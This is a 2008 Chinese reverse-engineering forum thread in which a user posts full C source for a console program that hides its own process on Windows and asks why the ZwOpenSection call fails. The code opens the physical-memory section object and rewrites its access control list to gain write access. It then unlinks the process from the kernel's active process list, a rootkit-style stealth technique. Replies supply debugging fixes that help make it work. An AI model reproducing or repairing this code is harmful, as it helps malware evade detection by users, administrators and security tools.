首页
社区
课程
招聘
[求助]ZwOpenSection失败
发表于: 2008-3-30 21:09 10044

[求助]ZwOpenSection失败

2008-3-30 21:09
10044
偶最近看到一段隐藏进程的代码
是MFC的程序 由于没学MFC
于是把它改成Console的

ZwOpenSection总是返回失败
理论上应该返回STATUS_ACCESS_DENIED才对
实在是不解 还望赐教

方法是前人用烂的摘链法
代码如下
#include <stdio.h>
//#include <windows.h>
#include <aclapi.h>

typedef LONG NTSTATUS;

#define NT_SUCCESS(Status)			((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED		((NTSTATUS)0xC0000022L)

typedef struct _UNICODE_STRING 
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES 
{ 
	ULONG Length; 
	HANDLE RootDirectory; 
	PUNICODE_STRING ObjectName; 
	ULONG Attributes; 
	PVOID SecurityDescriptor; 
	PVOID SecurityQualityOfService; 
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 

typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,

    IN POBJECT_ATTRIBUTES ObjectAttributes
    );

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
    );

static bool ishide = false;
HANDLE hSection = NULL;
PVOID mapPhyMemObject = NULL;

PVOID LinerAddressToPhysicAddress(PULONG Base, PVOID address)
{
	ULONG VAddress = (ULONG)address;
	ULONG PDE,PTE,PAddress;
	PDE = Base[VAddress>>22];
	if((PDE&1)==0)
		return 0;
	ULONG PageFlage = PDE&0x00000080;
	if (PageFlage != 0)
	{
		//PS位不为零,采用4MB分页方式
		PAddress = (PDE&0xffc00000) + (VAddress&0x003fffff);
	}
	else
	{
		//PS位为零,采用4kb分页方式
		PDE = (ULONG)MapViewOfFile(hSection,4,0,PDE&0xfffff000,0x1000);
		PTE = ((PULONG)PDE)[(VAddress&0x003ff000)>>12];
		if((PTE&1) == 0)
			return 0;
		PAddress = (PTE&0xfffff000)+(VAddress&0x00000fff);
		UnmapViewOfFile((PVOID)PDE);
	}
	return (PVOID)PAddress;
}

ULONG GetData(PVOID addr)
{
	ULONG phys = (ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)addr);
	PULONG tmp = (PULONG)MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,phys&0xfffff000,0x1000);
	if(tmp == 0)
		return 0;
	ULONG ret = tmp[(phys&0xfff)>>2];
	UnmapViewOfFile(tmp);
	return ret;
}

BOOL SetData(PVOID addr, ULONG data)
{
	ULONG phys = (ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)addr);
	PULONG tmp = (PULONG)MapViewOfFile(hSection,FILE_MAP_WRITE,0,phys&0xfffff000,0x1000);
	if(tmp == 0)
		return false;
	tmp[(phys&0xfff)>>2] = data;
	UnmapViewOfFile(tmp);
	return TRUE;
}

void AddACEtoPhyMemObject(HANDLE hSec)
{
	PACL pDacl = NULL;
	PSECURITY_DESCRIPTOR pSD = NULL;
	PACL pNewDacl = NULL;
	GetSecurityInfo(hSec,
					SE_KERNEL_OBJECT,
					DACL_SECURITY_INFORMATION,
					NULL,
					NULL,
					&pDacl,
					NULL,
					&pSD);
	
	EXPLICIT_ACCESS ea;
	RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
	ea.grfAccessPermissions = SECTION_MAP_WRITE; 
    ea.grfAccessMode = GRANT_ACCESS; 
    ea.grfInheritance= NO_INHERITANCE; 
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; 
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER; 
    ea.Trustee.ptstrName = "CURRENT_USER"; 

    SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
    
    SetSecurityInfo(hSec,
					SE_KERNEL_OBJECT,
					DACL_SECURITY_INFORMATION,
					NULL,
					NULL,
					pNewDacl,
					NULL);

    if(pSD) 
        LocalFree(pSD); 
    if(pNewDacl) 
        LocalFree(pNewDacl); 
}

HANDLE OpenPhyMemObject()
{
	NTSTATUS status;
	UNICODE_STRING PhyMemObjectString;
	OBJECT_ATTRIBUTES attributes;
	ULONG PhyDirAddress = 0x39000;
	
	HMODULE hNtdll = LoadLibrary("ntdll.dll");
	RTLINITUNICODESTRING RtlInitUnicodeString = 
		(RTLINITUNICODESTRING)GetProcAddress(hNtdll,"RtlInitUnicodeString");
	RtlInitUnicodeString(&PhyMemObjectString,L"Device\\PhysicalMemory");

	attributes.Length = sizeof(OBJECT_ATTRIBUTES);
	attributes.RootDirectory = NULL;
	attributes.ObjectName = &PhyMemObjectString;
	attributes.Attributes = 0;
	attributes.SecurityDescriptor = NULL;
	attributes.SecurityQualityOfService = NULL;

	ZWOPENSECTION ZwOpenSection = 
		(ZWOPENSECTION)GetProcAddress(hNtdll, "ZwOpenSection");

	status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
	if(status == STATUS_ACCESS_DENIED)
	{
		status = ZwOpenSection(&hSection,READ_CONTROL|WRITE_DAC,&attributes);
		AddACEtoPhyMemObject(hSection);
		status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
	}
	if(!NT_SUCCESS(status))
	{
		printf("opensection failed.\n");
		return NULL;
	}

	mapPhyMemObject = MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,PhyDirAddress,0x1000);
	FreeLibrary(hNtdll);
	return hSection;
}

bool hideprocess(bool hide)
{
	if(!OpenPhyMemObject())
	{
		printf("open physical memory failed.\n");
		return false;
	}
	ULONG thread = GetData((PVOID)0xffdff124);
	ULONG process = GetData((PVOID)(thread + 0x44));
	ULONG flink = GetData((PVOID)(process + 0x88));
	ULONG blink = GetData((PVOID)(process + 0x8c));
	
	if(hide == true && ishide == false)
	{
		SetData((PVOID)(flink + 4),blink);
		SetData((PVOID)(blink),flink);
	}
	if(hide == false && ishide == true)
	{
		//unhide()
	}
	return true;
}

int main()
{
	char ch;
	bool bExit = false;
	bool bRet;

	while(!bExit)
	{
		printf("h to hide\nu to unhide\ne to exit\n");
		ch = getchar();
		getchar();
		switch(ch)
		{
		case 'h':
			if(ishide == true)
			{
				printf("the process is already hiden.\n");
				break;
			}
			bRet = hideprocess(true);
			if(bRet)
			{
				printf("hide successfully.\n");
				ishide = true;
			}
			else
				printf("hide failed.\n");
			break;
		case 'u':
			if(ishide == false)
			{
				printf("the process is not hiden.\n");
				break;
			}
			bRet = hideprocess(false);
			if(bRet)
			{
				printf("unhide successfully.\n");
				ishide = false;
			}
			else
				printf("unhide failed.\n");
			break;
		case 'e':
			bExit = true;
			break;
		default:
			printf("unknown command.\n");
			break;
		}
	}

	return 0;
}

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (3)
雪    币: 709
活跃值: (2420)
能力值: ( LV12,RANK:1010 )
在线值:
发帖
回帖
粉丝
2
OpenPhyMemObject应该调用2次,否则不能访问系统高2GB空间

你再调试下
2008-3-30 21:36
0
雪    币: 27
活跃值: (12)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
3
调试结果是调用两次还是一样的
关键问题在这里
status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
  if(status == STATUS_ACCESS_DENIED)
  {
    status = ZwOpenSection(&hSection,READ_CONTROL|WRITE_DAC,&attributes);
    AddACEtoPhyMemObject(hSection);
    status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
  }

ZwOpenSection没有返回STATUS_ACCESS_DENIED
ACE也不用加了 直接就失败了 ~~~
2008-3-30 22:00
0
雪    币: 321
活跃值: (271)
能力值: ( LV13,RANK:1050 )
在线值:
发帖
回帖
粉丝
4
有一句疏漏。
status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
  if(status == STATUS_ACCESS_DENIED)
  {
    status = ZwOpenSection(&hSection,READ_CONTROL|WRITE_DAC,&attributes);
    AddACEtoPhyMemObject(hSection);
    status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
  }

在第二次调用ZwOpenSection之前加上一句
CloseHandle(hSection);
2008-3-30 22:33
0
游客
登录 | 注册 方可回帖
返回
//